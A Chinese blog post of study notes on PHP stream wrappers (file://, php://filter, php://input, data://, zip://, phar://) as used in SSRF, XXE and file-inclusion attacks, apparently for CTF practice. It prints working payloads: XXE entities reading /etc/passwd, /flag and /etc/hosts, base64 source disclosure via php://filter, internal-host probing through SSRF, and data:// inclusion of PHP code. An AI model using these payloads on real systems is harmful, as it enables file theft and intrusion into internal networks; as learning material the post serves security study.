漏洞中的伪协议异同

最新推荐文章于 2024-05-10 11:01:10 发布
最新推荐文章于 2024-05-10 11:01:10 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: 学习笔记 文章标签: web安全 xml 安全 学习 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/124384351
版权

PHP 中的封装协议(伪协议)

    file:///var/www/html 访问本地文件系统

    ftp://<login>:<password>@<ftpserveraddress> 访问 FTP(s) URLs

    data:// 数据流

    http:// — 访问 HTTP(s) URLs

    ftp:// — 访问 FTP(s) URLs

    php:// — 访问各个输入/输出流

    zlib:// — 压缩流

    data:// — Data (RFC 2397)

    glob:// — 查找匹配的文件路径模式

    phar:// — PHP Archive

    ssh2:// — Secure Shell 2

    rar:// — RAR

    ogg:// — Audio streams

    expect:// — 处理交互式的流

SSRF下的伪协议

SSRF(Server-Side Request Forgery:服务器端请求伪造)

是一个由攻击者构造请求,在目标服务端执行的一个安全漏洞。攻击者可以利用该漏洞使服务器端向攻击者构造的任意域发出请求,目标通常是从外网无法访问的内部系统。简而言之就是以服务器的身份来执行请求。

file:// 协议
用于访问本地文件系统。

file:///etc/passwd
file:///var/www/html/flag.php

http/s协议
探测内网主机存活

以此为例

?url=http://127.0.0.1

SSRF漏洞学习

XXE下的伪协议

任意文件读取

file:协议

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE note [
      <!ENTITY admin SYSTEM "file:///flag">
      ]>

php://协议

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
	<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
]>
<c>&test</c>

内网探测

http://

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "http://192.168.1.1:80/">
]>
<x>&f;</x>

file协议

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b SYSTEM "file:///etc/hosts">
]>

<user><username>&b;</username><password>admin</password></user>


/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie

XXE漏洞学习 

文件包含下的伪协议

file:// 

本地文件传输协议,File协议主要用于访问本地计算机中的文件

file:///etc/passwd

 php://input

php://input是个可以访问请求的原始数据的只读流

allow_url_include = On。

对 allow_url_fopen 不做要求。

file=php://input	



用post方式提交数据

 filter:

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用

 

 例:

php://filter/read=convert.base64-encode/resource=flag.php以base64编码将内容输出

zip

php 版本大于等于 php5.3.0

若是使用相对路径,则会包含失败。

协议原型:zip://archive.zip(压缩包名称)#dir/file.txt(压缩文件名称)

注意 url 编码,因为这个 # 会和 url 协议中的 # 冲突(%23)

file=zip://绝对路径/压缩包名字%23压缩文件名字

 data

    ?file=data:text/plain,<?php phpinfo();?>
 
    ?file=data:text/plain;base64,base64编码的payload

phar 

phar:// 数据流包装器。 可以将多个文件归入一个本地文件夹,也可以包含一个文件

大多数PHP文件操作允许使用各种URL协议去访问文件路径:如data://zlib://php://

文件包含漏洞&伪协议

H3018-R
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解析在C#接口和类的异同
08-26
今天小编就为大家分享一篇关于解析在C#接口和类的异同,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
SSRF漏洞file协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1449
关于SSRF漏洞(服务器端造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php可能存在SSRF漏洞的函数。1、file_get_
SSRF
ws1813004226的博客
05-17 4118
一、SSRF是什么? SSRF是由一种攻击者构造请求,由服务器端发起请求的安全漏洞。一般情况下SSRF的攻击目标是外网无法访问到的内部系统。(正因为请求是由服务器发起的,所以服务器端能请求到与自身相连而与外网隔离的内部系统。) 二、SSRF是怎样形成的? SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 三、SSRF主要攻击方式 (1)对外网,服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。 (2)攻击运行在内网或本地的应用程序。 (3)对内
SSRF最全总结(协议,绕过)
热门推荐
weixin_50464560的博客
01-13 1万+
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些初学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和
SSRF(3)协议读取文件&Gopher协议的利用
m0_64417923的博客
05-12 3977
一:Http、Dict和file等协议的利用 1,内网访问 所以构造: /?url=http://127.0.0.1/flag.php 得到: ctfhub{ce475b59a4baee959112777b} 2,协议读取文件 最经典的PHP协议就是file:///协议了,可以用来读取php源码 构造payload: /?url=file:///var/www/html/flag.php 得到: 在单击右键查看源代码: 得到flag: ctfh..
Web漏洞-SSRF漏洞(详细)
Ays.Ie的博客
03-10 2770
该篇为Web漏洞-SSRF漏洞(详细)
jquery绑定事件的异同
12-03
谈论jquerybind(),live(),delegate(),on()绑定事件方式 1. Bind() $(selector).bind(event,data,function) Event:必须项;添加到元素的一个或多个事件。 Data:可选;需要传递的参数 Function:必需;当绑定事件发生...
基础电子的浅析单片机与嵌入式系统异同
10-20
导读:本文简单分析了单片机与嵌入式系统的联系、组成结构对比等基础知识,并列举了几种适用于PIC18F系列单片机的几种嵌入式实时操作系统。  什么是单片机呢?一般我们将单片微型计算机简称为单片机,它不是完成某...
模拟技术的模拟IC与数字IC异同
10-16
处理连续性的光、声音、速度、温度等自然模拟信号的IC被称为模拟IC。模拟IC处理的这些信号都具有连续性,可以转换为正弦波研究。而数字IC处理的是非连续性信号,都是脉冲方波。  模拟IC按技术类型来分有只处理模拟...
CTFHUB SSRF 【全】
Jay17的博客
04-17 1217
CTFHUB SSRF 题解 【全】
SSRF漏洞学习
qi_SJQ_的博客
01-02 903
1.原理及成因 ssrf:服务端请求造,这个漏洞危害其实挺大的,外网直接打到内网,利用一台服务器上的web服务进而访问内网其他资产信息。 SSRF 形成的原因:大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 简而言之就是无法外网直接访问内网的其他主机,就能这个存在ssrf的主机当跳板来实现访问内网。 2.危险函数 主要是curl()函数,不过别的类似可以利用协议引入的函数也可以,比如file_get_.
SSRF的URL的协议
m0_55754984的博客
09-10 1993
当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL协议 0x01 类型 file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统获取文件: http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini 如果该服务器
【CTF | 网络安全】攻防世界 Web_php_include【php协议|data协议|file协议
等风来
05-22 9102
该题考察文件包含漏洞,涉及PHP协议data协议file协议及PHP内置函数等知识点,希望读者躬身实践。我是秋说,我们下次见。
协议小总结
TMNOA的博客
03-26 187
凌云壮志酬
PHP-协议
摘星怪sec的blog
04-25 3433
常用的协议有就可以利用使用文件包含函数包含文件时,文件的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面,我们将页面的内容使用解码,就可以获取文件的源码了。
文件包含支持的协议
qq_50673174的博客
05-15 7507
文件包含漏洞的补充。 主要是文件包含漏洞支持的协议
PHP协议
YV_LING的博客
11-06 330
CTF比赛关于PHP协议的使用。
WEB漏洞测试payload整理
nextdoor6的博客
12-14 9434
常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。 [反射型xss] [在html形成] "'>document.title="[random]"; document.title="[random]"; [在js形成] document.title="[random]";// ;document.titl
web安全之登录框渗透骚姿势,新思路
最新发布
qq_47289634的博客
05-10 628
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
捆绑协议与tcp/ip协议异同
06-09
TCP/IP协议是一种网络协议,它是互联网的基础协议,主要用于数据在网络的传输和路由。它由两个协议组成:TCP(传输控制协议)和IP(网际协议)。 捆绑协议是一种应用层协议,主要用于在网络传输文件,它可以将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值